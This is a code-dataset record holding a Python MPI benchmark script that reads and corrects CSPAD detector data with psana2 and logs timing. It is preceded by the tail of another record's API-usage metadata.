{"api_name": "matplotlib.pyplot.subplots", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": 
"matplotlib.patches.Rectangle", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.xlabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 253, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 258, 
"usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 273, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 273, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 274, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 274, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.figure", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 
312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 315, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 316, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}]}
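The ComputeForce class above accumulates per-element lift and drag into a resultant vertical force and forward moment. A condensed, self-contained sketch of that blade-element sum, with flat-plate Cl/Cd expressions standing in for the script's tabulated interpolators; all numbers are illustrative:

import numpy as np

def blade_element_resultants(R, dR, phi_deg, chord, pitch_deg, omega, v_vert, rho=1000.0):
    """Sum vertical force and forward (driving) moment over wing elements.

    R, dR, phi_deg: element radius [m], span [m], local cone angle [deg].
    Flat-plate Cl = 2*pi*alpha and a quadratic Cd are stand-ins only.
    """
    phi = np.deg2rad(phi_deg)
    u_rot = omega * R                       # rotational speed of each element
    u_vert = v_vert * np.cos(phi)           # vertical inflow projected on the element
    wind = np.arctan2(u_vert, u_rot)        # local inflow angle
    aoa = wind - np.deg2rad(pitch_deg)      # angle of attack
    q = 0.5 * rho * (u_rot**2 + u_vert**2) * chord * dR
    Cl, Cd = 2 * np.pi * aoa, 0.02 + 2 * np.sin(aoa)**2
    lift, drag = q * Cl, q * Cd
    fwd = np.sin(wind) * lift - np.cos(wind) * drag
    vert = (np.cos(wind) * lift + np.sin(wind) * drag) * np.cos(phi)
    return vert.sum(), (fwd * R).sum()

# Example: 20 elements along a 5 cm wing spinning at 10 Hz, descending at 0.3 m/s.
R = np.linspace(0.005, 0.05, 20)
print(blade_element_resultants(R, np.gradient(R), 20.0, 0.01, 5.0, 2 * np.pi * 10, 0.3))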
{"seq_id": "19365984025", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport socket\nimport psana\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom pickle import dump\n\nfrom benchmarking import Event,\\\n set_defaults,\\\n event_here, start, stop, log, event_log\n\n\n\n\n#\n# PSANA2 BENCHMARK, based on CCTBX's XTC_PROCESS pipeline.\n# COMMENT: I've started with cctbx_project/xfel/xtc_process.py and stripped\n# out all the things that I don't think are relevant to this benchmark\n#\n\n\n\n\n@log\ndef get_calib_file_path(env, address, run):\n \"\"\" Finds the path to the SLAC metrology file stored in a psana\n environment object's calibration store\n @param env psana environment object\n @param address address string for a detector\n @param run psana run object or run number\n \"\"\"\n\n from psana import Detector\n\n\n #\n # try to get it from the detector interface\n #\n\n try:\n start(\"load geometry from detector\")\n psana_det = Detector(address, run.env())\n ret = psana_det.pyda.geoaccess(run.run()).path\n stop(\"load geometry from detector\")\n\n return ret\n except Exception:\n pass\n\n\n #\n # try to get it from the calib store directly\n #\n\n from psana import ndarray_uint8_1, Source\n\n start(\"load geometry from calib store\")\n cls = env.calibStore()\n src = Source('DetInfo(%s)'%address)\n path_nda = cls.get(ndarray_uint8_1, src, 'geometry-calib')\n stop(\"load geometry from calib store\")\n\n if path_nda is None:\n return None\n return ''.join(map(chr, path_nda))\n\n\n\n@log\ndef env_dxtbx_from_slac_metrology(run, address):\n \"\"\" Loads a dxtbx cspad cbf header only object from the metrology path\n stored in a psana run object's calibration store\n @param run psana run object\n @param address address string for a detector\n \"\"\"\n\n start(\"load geometry data from detector\")\n det = run.Detector(address)\n geometry = det.raw.geometry()\n stop(\"load geometry data from detector\")\n\n if geometry is None:\n metro_path = get_calib_file_path(run.env(), address, run)\n elif geometry.valid:\n metro_path = None\n else:\n raise RuntimeError(f\"Could not read geometry, hostname: {socket.gethostname()}\")\n\n if metro_path is None and geometry is None:\n return None\n\n\n return None\n\n\n\n@log\ndef get_psana_corrected_data(psana_det, evt, use_default=False, dark=True,\n common_mode=None, apply_gain_mask=True,\n gain_mask_value=None, per_pixel_gain=False,\n gain_mask=None, additional_gain_factor=None):\n \"\"\"\n Given a psana Detector object, apply corrections as appropriate and return\n the data from the event\n @param psana_det psana Detector object\n @param evt psana event\n @param use_default If true, apply the default calibration only, using the\n psana algorithms. Otherwise, use the corrections specified by the rest of\n the flags and values passed in.\n @param dark Whether to apply the detector dark, bool or numpy array\n @param common_mode Which common mode algorithm to apply. None: apply no\n algorithm. Default: use the algorithm specified in the calib folder.\n Otherwise should be a list as specified by the psana documentation for\n common mode customization\n @param apply_gain_mask Whether to apply the common mode gain mask correction\n @param gain_mask_value Multiplier to apply to the pixels, according to the\n gain mask\n @param per_pixel_gain If available, use the per pixel gain deployed to the\n calibration folder\n @param gain_mask gain mask showing which pixels to apply gain mask value\n @param additional_gain_factor Additional gain factor. Pixel counts are\n divided by this number after all other corrections.\n @return Numpy array corrected as specified.\n \"\"\"\n\n # order is pedestals, then common mode, then gain mask, then per pixel gain\n\n # HACK: Force psana v2 behaviour\n PSANA2_VERSION = True\n\n\n start(\"psana_det.raw\")\n if PSANA2_VERSION:\n # in psana2, data are stored as raw, fex, etc so the selection\n # has to be given here when the detector interface is used.\n # for now, assumes cctbx uses \"raw\".\n psana_det = psana_det.raw\n stop(\"psana_det.raw\")\n\n\n if use_default:\n start(\"psana_det.calib\")\n ret = psana_det.calib(evt) # applies psana's complex run-dependent calibrations\n stop(\"psana_det.calib\")\n return ret\n\n\n start(\"psana_det.raw_data(evt)\")\n data = psana_det.raw_data(evt)\n stop(\"psana_det.raw_data(evt)\")\n if data is None:\n return\n\n\n start(\"subtract psana_det.pedestals()\")\n data = data.astype(np.float64)\n if isinstance(dark, bool):\n if dark:\n if PSANA2_VERSION:\n data -= psana_det.pedestals()\n else:\n data -= psana_det.pedestals(evt)\n elif isinstance(dark, np.ndarray):\n data -= dark\n stop(\"subtract psana_det.pedestals()\")\n\n\n if common_mode is not None and common_mode != \"default\":\n print(\"Applying common mode\")\n\n start(\"psana_det.common_mode_apply(data, common_mode)\")\n if common_mode == 'cspad_default':\n common_mode = (1,25,25,100,1) # default parameters for CSPAD images\n psana_det.common_mode_apply(data, common_mode)\n elif common_mode == 'unbonded':\n common_mode = (5,0,0,0,0) # unbonded pixels used for correction\n psana_det.common_mode_apply(data, common_mode)\n else: # this is how it was before.. Though I think common_mode would need to be a tuple..\n psana_det.common_mode_apply(data, common_mode)\n stop(\"psana_det.common_mode_apply(data, common_mode)\")\n else:\n print(\"Not applying common mode\")\n \n\n if apply_gain_mask:\n print(\"Applying gain mask\")\n\n start(\"apply gain mask\")\n if gain_mask is None: # TODO: consider try/except here\n gain_mask = psana_det.gain_mask(evt) == 1\n if gain_mask_value is None:\n try:\n gain_mask_value = psana_det._gain_mask_factor\n except AttributeError:\n print(\"No gain set for psana detector, using gain value of 1, consider disabling gain in your phil file\")\n gain_mask_value = 1\n data[gain_mask] = data[gain_mask]*gain_mask_value\n stop(\"apply gain mask\")\n else:\n print(\"Not applying gain mask\")\n\n\n if per_pixel_gain: # TODO: test this\n start(\"applying psana_det.gain()\")\n data *= psana_det.gain()\n stop(\"applying psana_det.gain()\")\n\n\n if additional_gain_factor is not None:\n data /= additional_gain_factor\n\n\n return data\n
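The part of get_psana_corrected_data worth remembering is the correction order: pedestal, then common mode, then gain mask, then per-pixel gain, then the extra divisor. A psana-free numpy mock of that ordering (common mode omitted; shapes and values illustrative, with 6.85 taken from the call site below):

import numpy as np

def correct_frame(raw, pedestal, gain_mask=None, gain_mask_value=6.85,
                  gain=None, extra_factor=None):
    """Mirror the correction order above on a plain array (no common mode)."""
    data = raw.astype(np.float64) - pedestal  # 1. pedestal subtraction
    if gain_mask is not None:                 # 2. gain-mask multiplication
        data[gain_mask] *= gain_mask_value
    if gain is not None:                      # 3. per-pixel gain
        data *= gain
    if extra_factor is not None:              # 4. additional gain factor
        data /= extra_factor
    return data

raw = np.random.randint(0, 2**14, size=(32, 185, 388))  # CSPAD-like shape
ped = np.full(raw.shape, 1200.0)
mask = np.zeros(raw.shape, dtype=bool)
mask[:, ::2, :] = True
corrected = correct_frame(raw, ped, gain_mask=mask)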
\n\n\n@log\ndef process_event(run, evt, psana_det):\n \"\"\"\n Process a single event from a run\n @param run psana run object\n @param evt psana event object\n @param psana_det psana Detector object\n \"\"\"\n\n\n # HACK: Force psana v2 behaviour\n PSANA2_VERSION = True\n\n start(\"construct event timestamp\")\n if PSANA2_VERSION:\n sec = evt._seconds\n nsec = evt._nanoseconds\n else:\n time = evt.get(psana.EventId).time()\n fid = evt.get(psana.EventId).fiducials()\n sec = time[0]\n nsec = time[1]\n\n ts = Event.as_timestamp(sec, nsec/1e6)\n stop(\"construct event timestamp\")\n\n print(\"Accepted\", ts)\n\n # HACK: these parameters have been extracted from a xtc_process run\n data = get_psana_corrected_data(psana_det, evt, use_default=False,\n dark=True, common_mode=None,\n apply_gain_mask=True, gain_mask_value=6.85,\n per_pixel_gain=False,\n additional_gain_factor=None)\n\n\n if data is None:\n print(\"ERROR! No data\")\n return\n\n\n timestamp = t = ts\n s = t[0:4] + t[5:7] + t[8:10] + t[11:13] + t[14:16] + t[17:19] + t[20:23]\n print(\"Loaded shot\", s)\n\n \n\n@log\ndef test_xtc_read(ds, comm, det_name):\n\n for run in ds.runs():\n\n start(f\"run.Detector({ds.det_name})\")\n det = run.Detector(ds.det_name)\n stop(f\"run.Detector({ds.det_name})\")\n\n # TODO: fix flex dependency\n # if comm.Get_rank() == 0:\n # PS_CALIB_DIR = os.environ.get('PS_CALIB_DIR')\n # assert PS_CALIB_DIR\n # dials_mask = easy_pickle.load(params.format.cbf.invalid_pixel_mask)\n # else:\n # dials_mask = None\n # dials_mask = comm.bcast(dials_mask, root=0)\n\n start(\"for evt in run.events()\")\n for evt in run.events():\n env_dxtbx_from_slac_metrology(run, det_name)\n\n process_event(run, evt, det)\n stop(\"for evt in run.events()\")\n
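set_defaults comes from the local benchmarking module and is not shown in this record; assuming it simply overlays user-supplied CLI values onto the defaults and drops unset entries, a plausible stand-in (hypothetical, not the project's actual implementation) looks like:

def set_defaults(cli_args, defaults):
    """Hypothetical stand-in: keep defaults, override with any CLI arg the user set."""
    merged = dict(defaults)
    merged.update({k: v for k, v in cli_args.items() if v is not None})
    # argparse yields strings; psana presumably wants ints for these (assumption).
    for key in ("run", "max_events"):
        if key in merged:
            merged[key] = int(merged[key])
    return merged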
No data\")\n return\n\n\n timestamp = t = ts\n s = t[0:4] + t[5:7] + t[8:10] + t[11:13] + t[14:16] + t[17:19] + t[20:23]\n print(\"Loaded shot\", s)\n\n \n\n@log\ndef test_xtc_read(ds, comm, det_name):\n\n for run in ds.runs():\n\n start(f\"run.Detector({ds.det_name})\")\n det = run.Detector(ds.det_name)\n stop(f\"run.Detector({ds.det_name})\")\n\n # TODO: fix flex dependency\n # if comm.Get_rank() == 0:\n # PS_CALIB_DIR = os.environ.get('PS_CALIB_DIR')\n # assert PS_CALIB_DIR\n # dials_mask = easy_pickle.load(params.format.cbf.invalid_pixel_mask)\n # else:\n # dials_mask = None\n # dials_mask = comm.bcast(dials_mask, root=0)\n\n start(\"for evt in run.events()\")\n for evt in run.events():\n env_dxtbx_from_slac_metrology(run, det_name)\n\n process_event(run, evt, det)\n stop(\"for evt in run.events()\")\n\n\n\n\nif __name__ == \"__main__\":\n\n # Defaul data\n default_parameters = {\n \"exp\" : \"cxid9114\",\n \"run\" : 1,\n \"dir\" : \"/img/data/xtc_test\",\n \"max_events\" : 0,\n \"det_name\" : \"cspad\"\n }\n\n\n # Input args allowed by psana.DataSource\n psana_args = [\"exp\", \"run\", \"dir\", \"max_events\", \"det_name\", \"batch_size\"]\n\n\n #\n # Parse input arguments\n #\n\n parser = ArgumentParser()\n\n for arg in psana_args:\n parser.add_argument(f\"--{arg}\", help=\"psana.DataSource kwarg\")\n\n parser.add_argument(\"--of\",\n help=\"Log dir -- every rank will write its own log file\")\n\n # Get args dict, and sanitize None types\n args = vars(parser.parse_args())\n\n output_name = args[\"of\"]\n del args[\"of\"] # don't pass this to psana\n\n psana_kwargs = set_defaults(args, default_parameters)\n\n\n\n #\n # Initialize MPI\n #\n\n start(\"INIT MPI\")\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n stop(\"INIT MPI\")\n\n rank = comm.Get_rank() # each process in MPI has a unique id, 0-indexed\n\n\n #\n # Run Benchmark\n #\n\n if rank == 0:\n print(\"MPI Initialized, Running xtc_read Benchmark\")\n\n start(f\"psana.DataSource({psana_kwargs})\")\n ds = psana.DataSource(**psana_kwargs)\n stop(f\"psana.DataSource({psana_kwargs})\")\n\n test_xtc_read(ds, comm, psana_kwargs[\"det_name\"])\n\n\n #\n # Save log files\n #\n\n if rank == 0:\n print(\"Writing logs\")\n\n log_path = os.path.join(output_name, f\"debug_{rank}.txt\")\n with open(log_path, \"w\") as f:\n for entry in event_log(cctbx_fmt=True):\n print(entry, file=f)\n", "repo_name": "JBlaschke/psana2_benchmarks", "sub_path": "opt/benchmark_xtc_read.py", "file_name": "benchmark_xtc_read.py", "file_ext": "py", "file_size_in_byte": 10502, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "benchmarking.start", "line_number": 45, "usage_type": "call"}, {"api_name": "psana.Detector", "line_number": 46, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 48, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 61, "usage_type": "call"}, {"api_name": "psana.Source", "line_number": 63, "usage_type": "call"}, {"api_name": "psana.ndarray_uint8_1", "line_number": 64, "usage_type": "argument"}, {"api_name": "benchmarking.stop", "line_number": 65, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 28, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 81, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 84, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 91, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 
